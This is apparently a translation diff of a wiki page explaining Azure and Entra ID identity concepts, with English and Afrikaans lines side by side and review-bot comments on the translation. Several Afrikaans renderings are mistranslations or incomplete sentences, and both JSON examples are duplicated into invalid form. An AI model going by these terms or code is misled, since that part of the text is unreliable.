- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
- This will have an **email address** with the domain of the EntraID tenant.
- **Sekuriteit**: Hierdie tipe groep word gebruik om lede toegang te gee tot toepassings, hulpbronne en om lisensies toe te ken. Gebruikers, toestelle, diens prinsipale en ander groepe kan lede wees.
- **Microsoft 365**: Hierdie tipe groep word gebruik vir samewerking, wat lede toegang gee tot 'n gedeelde posbus, kalender, lêers, SharePoint webwerf, ensovoorts. Groep lede kan slegs gebruikers wees.
- Dit sal 'n **e-pos adres** hê met die domein van die EntraID huur.
There are **2 types of memberships**:
Daar is **2 tipes lidmaatskappe**:
- **Assigned**: Allow to manually add specific members to a group.
- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
- **Toegeken**: Laat toe om spesifieke lede handmatig aan 'n groep toe te voeg.
- **Dinamiese lidmaatskap**: Bestuur lidmaatskap outomaties met behulp van reëls, wat die groep insluiting opdateer wanneer lede se eienskappe verander.
### **Service Principals**
### **Diens Prinsipale**
A **Service Principal** is an **identity** created for **use** with **applications**, hosted services, and automated tools to access Azure resources. This access is **restricted by the roles assigned** to the service principal, giving you control over **which resources can be accessed** and at which level. For security reasons, it's always recommended to **use service principals with automated tools** rather than allowing them to log in with a user identity.
'n **Diens Prinsipaal** is 'n **identiteit** geskep vir **gebruik** met **toepassings**, gehoste dienste, en geoutomatiseerde gereedskap om toegang tot Azure hulpbronne te verkry. Hierdie toegang is **beperk deur die rolle wat aan die diens prinsipaal toegeken is**, wat jou beheer gee oor **watter hulpbronne toegang verkry** en op watter vlak. Om veiligheidsredes, word dit altyd aanbeveel om **diens prinsipale met geoutomatiseerde gereedskap te gebruik** eerder as om hulle toe te laat om met 'n gebruikersidentiteit aan te meld.
It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
Dit is moontlik om **direk as 'n diens prinsipaal aan te meld** deur 'n **geheim** (wagwoord), 'n **sertifikaat**, of deur **federale** toegang aan derdeparty platforms (bv. Github Actions) oor dit te verleen.
- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
- If you choose certificate authentication, make sure the **application will have access over the private key**.
- As jy **wagwoord** autentisering kies (per standaard), **stoor die gegenereerde wagwoord** aangesien jy dit nie weer kan toegang nie.
- As jy sertifikaat autentisering kies, maak seker dat die **toepassing toegang sal hê oor die private sleutel**.
### App Registrations
### App Registrasies
An **App Registration** is a configuration that allows an application to integrate with Entra ID and to perform actions.
'n **App Registrasie** is 'n konfigurasie wat 'n toepassing toelaat om met Entra ID te integreer en aksies uit te voer.
#### Key Components:
#### Sleutel Komponente:
1. **Application ID (Client ID):** A unique identifier for your app in Azure AD.
2. **Redirect URIs:** URLs where Azure AD sends authentication responses.
3. **Certificates, Secrets & Federated Credentials:** It's possible to generate a secret or a certificate to login as the service principal of the application, or to grant federated access to it (e.g. Github Actions).&#x20;
1. If a **certificate** or **secret** is generated, it's possible to a person to **login as the service principal** with CLI tools by knowing the **application ID**, the **secret** or **certificate** and the **tenant** (domain or ID).
4. **API Permissions:** Specifies what resources or APIs the app can access.
5. **Authentication Settings:** Defines the app's supported authentication flows (e.g., OAuth2, OpenID Connect).
6. **Service Principal**: A service principal is created when an App is created (if it's done from the web console) or when it's installed in a new tenant.
1. The **service principal** will get all the requested permissions it was configured with.
1. **Toepassing ID (Kliënt ID):** 'n Unieke identifiseerder vir jou app in Azure AD.
2. **Herlei URIs:** URL's waar Azure AD autentisering antwoorde stuur.
3. **Sertifikate, Geheimen & Federale Kredite:** Dit is moontlik om 'n geheim of 'n sertifikaat te genereer om as die diens prinsipaal van die toepassing aan te meld, of om federale toegang aan dit te verleen (bv. Github Actions).&#x20;
1. As 'n **sertifikaat** of **geheim** gegenereer word, is dit moontlik vir 'n persoon om **as die diens prinsipaal** met CLI gereedskap aan te meld deur die **toepassing ID**, die **geheim** of **sertifikaat** en die **huur** (domein of ID) te ken.
4. **API Toestemmings:** Spesifiseer watter hulpbronne of API's die app kan toegang.
5. **Autentisering Instellings:** Definieer die app se ondersteunde autentisering vloei (bv., OAuth2, OpenID Connect).
6. **Diens Prinsipaal**: 'n diens prinsipaal word geskep wanneer 'n App geskep word (as dit vanaf die webkonsol gedoen word) of wanneer dit in 'n nuwe huur geïnstalleer word.
1. Die **diens prinsipaal** sal al die gevraagde toestemmings wat dit geconfigureer is, ontvang.
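Review bot: "huur" is the wrong noun for tenant in L422 ("die domein van die EntraID huur"), L456 ("die **huur** (domein of ID)") and L459 ("in 'n nuwe huur geïnstalleer"); "huur" means rent, and this same translation uses "huurder" for tenant at L674 ("die Entra ID huurder"). Use "huurder" throughout. Likewise "Federale Kredite" at L455 renders "credentials" as "credits"; "federale geloofsbriewe" (or leaving the English term) keeps the meaning of L447.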
### Default Consent Permissions
### Standaard Toestemming Toestemmings
**User consent for applications**
**Gebruiker toestemming vir toepassings**
- **Do not allow user consent**
- An administrator will be required for all apps.
- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
- All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
- **Default** low impact permissions (although you need to accept to add them as low):
- User.Read - sign in and read user profile
- offline_access - maintain access to data that users have given it access to
- openid - sign users in
- profile - view user's basic profile
- email - view user's email address
- **Allow user consent for apps (Default)**
- All users can consent for any app to access the organization's data.
- **Moet nie gebruiker toestemming toelaat nie**
- 'n Administrateur sal vir alle apps benodig word.
- **Laat gebruiker toestemming toe vir apps van geverifieerde uitgewers, vir geselekteerde toestemmings (Aanbeveel)**
- Alle gebruikers kan toestemming gee vir toestemmings wat as "lae impak" geklassifiseer is, vir apps van geverifieerde uitgewers of apps wat in hierdie organisasie geregistreer is.
- **Standaard** lae impak toestemmings (alhoewel jy moet aanvaar om hulle as laag by te voeg):
- User.Read - teken in en lees gebruikersprofiel
- offline_access - hou toegang tot data wat gebruikers toegang gegee het
- openid - teken gebruikers in
- profile - sien gebruiker se basiese profiel
- email - sien gebruiker se e-pos adres
- **Laat gebruiker toestemming toe vir apps (Standaard)**
- Alle gebruikers kan toestemming gee vir enige app om toegang tot die organisasie se data te verkry.
**Admin consent requests**: Default **No**
**Admin toestemming versoeke**: Standaard **Nee**
- Users can request admin consent to apps they are unable to consent to
- If **Yes**: Its possible to indicate Users, Groups and Roles that can consent requests
- Configure also if users will receive email notifications and expiration reminders&#x20;
- Gebruikers kan admin toestemming versoek vir apps waartoe hulle nie toestemming kan gee nie
- As **Ja**: Dit is moontlik om Gebruikers, Groepe en Rolle aan te dui wat toestemming versoeke kan gee
- Konfigureer ook of gebruikers e-pos kennisgewings en vervaldatums herinneringe sal ontvang&#x20;
### **Managed Identity (Metadata)**
### **Bestuurde Identiteit (Metadata)**
Managed identities in Azure Active Directory offer a solution for **automatically managing the identity** of applications. These identities are used by applications for the purpose of **connecting** to **resources** compatible with Azure Active Directory (**Azure AD**) authentication. This allows to **remove the need of hardcoding cloud credentials** in the code as the application will be able to contact the **metadata** service to get a valid token to **perform actions** as the indicated managed identity in Azure.
Bestuurde identiteite in Azure Aktiewe Gids bied 'n oplossing vir **outomatiese bestuur van die identiteit** van toepassings. Hierdie identiteite word deur toepassings gebruik om te **verbinde** met **hulpbronne** wat versoenbaar is met Azure Aktiewe Gids (**Azure AD**) autentisering. Dit maak dit moontlik om **die behoefte aan hardkoding van wolk akrediteer** in die kode te verwyder aangesien die toepassing in staat sal wees om die **metadata** diens te kontak om 'n geldige token te **verrig** as die aangeduide bestuurde identiteit in Azure.
There are two types of managed identities:
Daar is twee tipes bestuurde identiteite:
- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
- **Stelsel-toegeken**. Sommige Azure dienste laat jou toe om 'n **bestuurde identiteit direk op 'n diens instansie** in te skakel. Wanneer jy 'n stelsel-toegeken bestuurde identiteit inskakel, word 'n **diens prinsipaal** geskep in die Entra ID huur wat deur die subskripsie vertrou word waar die hulpbron geleë is. Wanneer die **hulpbron** verwyder word, verwyder Azure outomaties die **identiteit** vir jou.
- **Gebruiker-toegeken**. Dit is ook moontlik vir gebruikers om bestuurde identiteite te genereer. Hierdie word binne 'n hulpbron groep binne 'n subskripsie geskep en 'n diens prinsipaal sal in die EntraID geskep word wat deur die subskripsie vertrou word. Dan kan jy die bestuurde identiteit aan een of **meer instansies** van 'n Azure diens toeken. Vir gebruiker-toegeken bestuurde identiteite, word die **identiteit apart bestuur van die hulpbronne wat dit gebruik**.
Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
Bestuurde Identiteite **genereer nie ewige akrediteer** (soos wagwoorde of sertifikate) om toegang te verkry as die diens prinsipaal wat aan dit geheg is.
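Review bot: L500 drops the purpose of the token. "om die **metadata** diens te kontak om 'n geldige token te **verrig** as die aangeduide bestuurde identiteit" reads as "to perform a valid token", whereas L499 says "get a valid token to **perform actions** as the indicated managed identity"; suggest "om 'n geldige token te kry om **aksies uit te voer** as die aangeduide bestuurde identiteit". Also "akrediteer" at L500 ("hardkoding van wolk akrediteer") and L508 ("genereer nie ewige akrediteer") is the verb "to accredit", not a noun for credentials; "geloofsbriewe" fits both places.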
### Enterprise Applications
### Enterprise Toepassings
Its just a **table in Azure to filter service principals** and check the applications that have been assigned to.
Dit is net 'n **tafel in Azure om diens prinsipale te filter** en die toepassings wat aan hulle toegeken is, te kontroleer.
**It isnt another type of “application”,** there isnt any object in Azure that is an Enterprise Application”, its just an abstraction to check the Service principals, App registrations and managed identities.
**Dit is nie 'n ander tipe "toepassing" nie,** daar is geen objek in Azure wat 'n "Enterprise Toepassing" is nie, dit is net 'n abstraksie om die Diens prinsipale, App registrasies en bestuurde identiteite te kontroleer.
### Administrative Units
### Administratiewe Eenhede
Administrative units allows to **give permissions from a role over a specific portion of an organization**.
Administratiewe eenhede laat toe om **toestemmings van 'n rol oor 'n spesifieke gedeelte van 'n organisasie te gee**.
Example:
Voorbeeld:
- Scenario: A company wants regional IT admins to manage only the users in their own region.
- Implementation:
- Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
- Populate AUs with users from their respective regions.
- AUs can **contain users, groups, or devices**
- AUs support **dynamic memberships**
- AUs **cannot contain AUs**
- Assign Admin Roles:
- Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
- Scenario: 'n Maatskappy wil regionale IT admins toelaat om slegs die gebruikers in hul eie streek te bestuur.
- Implementering:
- Skep Administratiewe Eenhede vir elke streek (bv., "Noord-Amerika AU", "Europa AU").
- Vul AU's met gebruikers uit hul onderskeie streke.
- AU's kan **gebruikers, groepe, of toestelle** bevat
- AU's ondersteun **dinamiese lidmaatskappe**
- AU's **kan nie AU's bevat nie**
- Ken Admin Rolle toe:
- Gee die "Gebruiker Administrateur" rol aan regionale IT personeel, geskaal na hul streek se AU.
- Uitkoms: Regionale IT admins kan gebruikersrekeninge binne hul streek bestuur sonder om ander streke te beïnvloed.
### Entra ID Roles
### Entra ID Rolle
- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
- Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- The most privileged role is **Global Administrator**
- In the Description of the role its possible to see its **granular permissions**
- Ten einde Entra ID te bestuur, is daar 'n paar **ingeboude rolle** wat aan Entra ID prinsipale toegeken kan word om Entra ID te bestuur
- Kyk na die rolle in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
- Die mees bevoorregte rol is **Globale Administrateur**
- In die Beskrywing van die rol is dit moontlik om sy **fynere toestemmings** te sien
## Roles & Permissions
## Rolle & Toestemmings
**Roles** are **assigned** to **principals** on a **scope**: `principal -[HAS ROLE]->(scope)`
**Rolle** word **toegeken** aan **prinsipale** op 'n **skaal**: `prinsipaal -[HEE ROLE]->(skaal)`
**Roles** assigned to **groups** are **inherited** by all the **members** of the group.
**Rolle** wat aan **groepe** toegeken word, word **geërf** deur al die **lede** van die groep.
Depending on the scope the role was assigned to, the **role** cold be **inherited** to **other resources** inside the scope container. For example, if a user A has a **role on the subscription**, he will have that **role on all the resource groups** inside the subscription and on **all the resources** inside the resource group.
Afhangende van die skaal waaraan die rol toegeken is, kan die **rol** **geërf** word na **ander hulpbronne** binne die skaal houer. Byvoorbeeld, as 'n gebruiker A 'n **rol op die subskripsie** het, sal hy daardie **rol op al die hulpbron groepe** binne die subskripsie hê en op **al die hulpbronne** binne die hulpbron groep.
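Review bot: the inline code span at L554 was translated and garbled: `principal -[HAS ROLE]->(scope)` became `prinsipaal -[HEE ROLE]->(skaal)`, where "HEE" is not a word and "skaal" means scale, not scope. Backtick spans should stay as in the source, as was correctly done for `actions` and `dataActions` at L607-608. The prose uses "skaal"/"skale" for scope as well (L554, L558 "Afhangende van die skaal", L601 "binne 'n skaal geskep ... in verskeie skale") while L693 uses "omvang" for the same concept; "omvang" is the term to keep.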
### **Classic Roles**
### **Klassieke Rolle**
| **Owner** | <ul><li>Full access to all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| ----------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
| **Contributor** | <ul><li>Full access to all resources</li><li>Cannot manage access</li></ul> | All resource types |
| **Reader** | • View all resources | All resource types |
| **User Access Administrator** | <ul><li>View all resources</li><li>Can manage access for other users</li></ul> | All resource types |
| **Eienaar** | <ul><li>Volledige toegang tot alle hulpbronne</li><li>Kan toegang vir ander gebruikers bestuur</li></ul> | Alle hulpbron tipes |
| ------------------------------- | ---------------------------------------------------------------------------------------- | ------------------ |
| **Bydraer** | <ul><li>Volledige toegang tot alle hulpbronne</li><li>Kan nie toegang bestuur nie</li></ul> | Alle hulpbron tipes |
| **Leser** | • Sien alle hulpbronne | Alle hulpbron tipes |
| **Gebruiker Toegang Administrateur** | <ul><li>Sien alle hulpbronne</li><li>Kan toegang vir ander gebruikers bestuur</li></ul> | Alle hulpbron tipes |
### Built-In roles
### Gebou-in rolle
[From the docs: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure role-based access control (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) has several Azure **built-in roles** that you can **assign** to **users, groups, service principals, and managed identities**. Role assignments are the way you control **access to Azure resources**. If the built-in roles don't meet the specific needs of your organization, you can create your own [**Azure custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
[Van die dokumentasie: ](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles)[Azure rol-gebaseerde toegangbeheer (Azure RBAC)](https://learn.microsoft.com/en-us/azure/role-based-access-control/overview) het verskeie Azure **gebou-in rolle** wat jy kan **toeken** aan **gebruikers, groepe, diens prinsipale, en bestuurde identiteite**. Rol toekennings is die manier waarop jy **toegang tot Azure hulpbronne** beheer. As die gebou-in rolle nie aan die spesifieke behoeftes van jou organisasie voldoen nie, kan jy jou eie [**Azure pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)**.**
**Built-In** roles apply only to the **resources** they are **meant** to, for example check this 2 examples of **Built-In roles over Compute** resources:
**Gebou-in** rolle geld slegs vir die **hulpbronne** waarvoor hulle **bedoel** is, byvoorbeeld kyk na hierdie 2 voorbeelde van **Gebou-in rolle oor Compute** hulpbronne:
| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Provides permission to backup vault to perform disk backup. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| [Disk Backup Reader](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#disk-backup-reader) | Bied toestemming aan om rugsteun kluise te gebruik om disk rugsteun te doen. | 3e5e47e6-65f7-47ef-90b5-e5dd4d455f24 |
| ----------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ------------------------------------ |
| [Virtual Machine User Login](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | View Virtual Machines in the portal and login as a regular user. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
| [Virtuele Masjien Gebruiker Aanmelding](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-user-login) | Sien Virtuele Masjiene in die portaal en meld aan as 'n gewone gebruiker. | fb879df8-f326-4884-b1cf-06f3ad86be52 |
This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
Hierdie rolle kan **ook toegeken word oor logiese houers** (soos bestuursgroepe, subskripsies en hulpbron groepe) en die prinsipale wat geraak word, sal dit **oor die hulpbronne binne daardie houers**.
- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
- Vind hier 'n lys met [**alle Azure gebou-in rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
- Vind hier 'n lys met [**alle Entra ID gebou-in rolle**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
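Review bot: L574 loses its verb: "kan jy jou eie [**Azure pasgemaakte rolle**](...)**.**" has no "skep" where L573 says "you can create your own"; and L583 ends without its verb, "sal dit **oor die hulpbronne binne daardie houers**." needs "hê" to say "will have them". Separately, both tables place a role row where markdown expects the header row (the `| ---- |` delimiter follows it), so "Eienaar" (L566) and "Disk Backup Reader" (L578) render as column headings; this is inherited from L561 and L577, but since these rows are being rewritten anyway, a header such as `| Rol | Toestemmings | Hulpbron tipes |` above the delimiter would fix the rendering.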
### Custom Roles
### Pasgemaakte Rolle
- Its also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
- Its possible to configure all the granular permissions the custom role will have
- Its possible to exclude permissions
- A principal with a excluded permission wont be able to use it even if the permissions is being granted elsewhere
- Its possible to use wildcards
- The used format is a JSON
- `actions` are for control actions over the resource
- `dataActions` are permissions over the data within the object
Example of permissions JSON for a custom role:
- Dit is ook moontlik om [**pasgemaakte rolle**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles) te skep
- Hulle word binne 'n skaal geskep, alhoewel 'n rol in verskeie skale kan wees (bestuursgroepe, subskripsie en hulpbron groepe)
- Dit is moontlik om al die fynere toestemmings wat die pasgemaakte rol sal hê, te konfigureer
- Dit is moontlik om toestemmings uit te sluit
- 'n prinsipaal met 'n uitgeslote toestemming sal dit nie kan gebruik nie, selfs al word die toestemming elders toegeken
- Dit is moontlik om wildcard te gebruik
- Die gebruikte formaat is 'n JSON
- `actions` is vir beheer aksies oor die hulpbron
- `dataActions` is toestemmings oor die data binne die objek
Voorbeeld van toestemmings JSON vir 'n pasgemaakte rol:
```json
{
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
"properties": {
"roleName": "",
"description": "",
"assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
"permissions": [
{
"actions": [
"Microsoft.DigitalTwins/register/action",
"Microsoft.DigitalTwins/unregister/action",
"Microsoft.DigitalTwins/operations/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/read",
"Microsoft.DigitalTwins/digitalTwinsInstances/write",
"Microsoft.CostManagement/exports/*"
],
"notActions": [
"Astronomer.Astro/register/action",
"Astronomer.Astro/unregister/action",
"Astronomer.Astro/operations/read",
"Astronomer.Astro/organizations/read"
],
"dataActions": [],
"notDataActions": []
}
]
}
}
```
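Review bot: the fenced JSON was rewritten without any translatable content changing: L637-661 repeat L612-636 character for character apart from indentation, and the same happens at L729-741 against L716-728 in the policy example. A translation commit should leave fenced code byte-identical so the diff shows only prose changes and values such as the `assignableScopes` subscription ID cannot be altered by accident.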
### Permissies volgorde
### Permissions order
- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
- An explicit **deny role assignment takes precedence** over the role granting the permission.
- Ten einde vir 'n **hoofpersoon om toegang tot 'n hulpbron te hê** moet daar 'n eksplisiete rol aan hom toegeken word (op enige manier) **wat hom daardie toestemming gee**.
- 'n Eksplisiete **weier roltoewysing het voorrang** bo die rol wat die toestemming gee.
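Review bot: terminology drifts in this region. L664 "Permissies volgorde" introduces a new word for permissions next to "Toestemmings" used in the headings at L462 and L552, and L668 "hoofpersoon" is a third rendering of "principal" alongside "prinsipaal" (L554) and "prinsiep" (L754). One term per concept ("toestemmings", "prinsipaal") is needed for readers to connect the role, consent and inheritance sections.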
<figure><img src="../../../images/image (191).png" alt=""><figcaption><p><a href="https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10">https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10</a></p></figcaption></figure>
### Global Administrator
### Globale Administrateur
Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
Globale Administrateur is 'n rol van Entra ID wat **volledige beheer oor die Entra ID huurder gee**. Dit gee egter nie standaard enige toestemmings oor Azure hulpbronne nie.
Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
Gebruikers met die Globale Administrateur rol het die vermoë om '**te verhoog' na die Gebruikerstoegang Administrateur Azure rol in die Wortelbestuursgroep**. So kan Globale Administrateurs toegang in **alle Azure subskripsies en bestuursgroepe bestuur.**\
Hierdie verhoging kan aan die einde van die bladsy gedoen word: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
<figure><img src="../../../images/image (349).png" alt=""><figcaption></figcaption></figure>
### Azure Policies
### Azure Beleide
**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking.
**Azure Beleide** is reëls wat organisasies help om te verseker dat hul hulpbronne aan spesifieke standaarde en nakomingsvereistes voldoen. Hulle stel jou in staat om **instellings op hulpbronne in Azure af te dwing of te oudit**. Byvoorbeeld, jy kan die skepping van virtuele masjiene in 'n nie-geautoriseerde streek voorkom of verseker dat alle hulpbronne spesifieke etikette het vir opsporing.
Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources.
Azure Beleide is **proaktief**: hulle kan nie-nakomende hulpbronne stop om geskep of verander te word. Hulle is ook **reaktief**, wat jou toelaat om bestaande nie-nakomende hulpbronne te vind en reg te stel.
#### **Key Concepts**
#### **Belangrike Konsepte**
1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required.
2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group).
3. **Initiatives**: A collection of policies grouped together for broader enforcement.
4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append").
1. **Beleid Definisie**: 'n Reël, geskryf in JSON, wat spesifiseer wat toegelaat of vereis word.
2. **Beleid Toewysing**: Die toepassing van 'n beleid op 'n spesifieke omvang (bv. subskripsie, hulpbron groep).
3. **Inisiatiewe**: 'n Versameling van beleide wat saamgegroepeer is vir breër afdwinging.
4. **Effek**: Spesifiseer wat gebeur wanneer die beleid geaktiveer word (bv. "Weier," "Oudit," of "Voeg by").
**Some examples:**
**Sommige voorbeelde:**
1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance.
2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments.
3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs.
4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources.
5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network.
6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption.
1. **Verseker Nakoming met Spesifieke Azure Streke**: Hierdie beleid verseker dat alle hulpbronne in spesifieke Azure streke ontplooi word. Byvoorbeeld, 'n maatskappy mag wil verseker dat al sy data in Europa gestoor word vir GDPR-nakoming.
2. **Afgedwonge Naamstandaarde**: Beleide kan naamkonvensies vir Azure hulpbronne afdwing. Dit help om hulpbronne te organiseer en maklik te identifiseer op grond van hul name, wat nuttig is in groot omgewings.
3. **Beperking van Sekere Hulpbron Tipes**: Hierdie beleid kan die skepping van sekere tipes hulpbronne beperk. Byvoorbeeld, 'n beleid kan ingestel word om die skepping van duur hulpbron tipes, soos sekere VM-groottes, te voorkom om koste te beheer.
4. **Afgedwonge Etikettering Beleide**: Etikette is sleutel-waarde pare wat met Azure hulpbronne geassosieer word en gebruik word vir hulpbronbestuur. Beleide kan afdwing dat sekere etikette teenwoordig moet wees, of spesifieke waardes moet hê, vir alle hulpbronne. Dit is nuttig vir kostesporing, eienaarskap, of kategorisering van hulpbronne.
5. **Beperking van Publieke Toegang tot Hulpbronne**: Beleide kan afdwing dat sekere hulpbronne, soos stoor rekeninge of databasisse, nie publieke eindpunte het nie, wat verseker dat hulle slegs binne die organisasie se netwerk toeganklik is.
6. **Outomatiese Toepassing van Sekuriteitsinstellings**: Beleide kan gebruik word om outomaties sekuriteitsinstellings op hulpbronne toe te pas, soos om 'n spesifieke netwerk sekuriteitsgroep op alle VM's toe te pas of te verseker dat alle stoor rekeninge versleuteling gebruik.
Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups.
Azure policy json example:
Let daarop dat Azure Beleide aan enige vlak van die Azure hiërargie geheg kan word, maar hulle word **gewoonlik in die wortelbestuursgroep** of in ander bestuursgroepe gebruik.
Azure beleid json voorbeeld:
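Review bot: L695 translates the effect names to "Weier," "Oudit," "Voeg by", but these are literal values of the `effect` field (the example that follows keeps `"effect": "Deny"` at L735), so the prose no longer matches the JSON a reader has to write. Keep them as `Deny`, `Audit` and `Append`, with an Afrikaans gloss in parentheses if one is wanted.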
```json
{
"policyRule": {
"if": {
"field": "location",
"notIn": ["eastus", "westus"]
},
"then": {
"effect": "Deny"
}
},
"parameters": {},
"displayName": "Allow resources only in East US and West US",
"description": "This policy ensures that resources can only be created in East US or West US.",
"mode": "All"
"policyRule": {
"if": {
"field": "location",
"notIn": ["eastus", "westus"]
},
"then": {
"effect": "Deny"
}
},
"parameters": {},
"displayName": "Allow resources only in East US and West US",
"description": "This policy ensures that resources can only be created in East US or West US.",
"mode": "All"
}
```
### Toestemmings Erf
### Permissions Inheritance
In Azure **kan toestemmings aan enige deel van die hiërargie toegeken word**. Dit sluit bestuursgroepe, subskripsies, hulpbron groepe, en individuele hulpbronne in. Toestemmings word **geërf** deur die ingeslote **hulpbronne** van die entiteit waar hulle toegeken is.
In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned.
This hierarchical structure allows for efficient and scalable management of access permissions.
Hierdie hiërargiese struktuur stel doeltreffende en skaalbare bestuur van toegangstoestemmings in staat.
<figure><img src="../../../images/image (26).png" alt=""><figcaption></figcaption></figure>
### Azure RBAC vs ABAC
**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\
However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**.
**RBAC** (rol-gebaseerde toegangbeheer) is wat ons reeds in die vorige afdelings gesien het: **'n rol aan 'n prinsiep toe te ken om hom toegang te gee** oor 'n hulpbron.\
E however, in sommige gevalle wil jy dalk **meer fyn-gegradeerde toegangsbewaking** of **vereenvoudig** die bestuur van **honderde** rol **toekennings**.
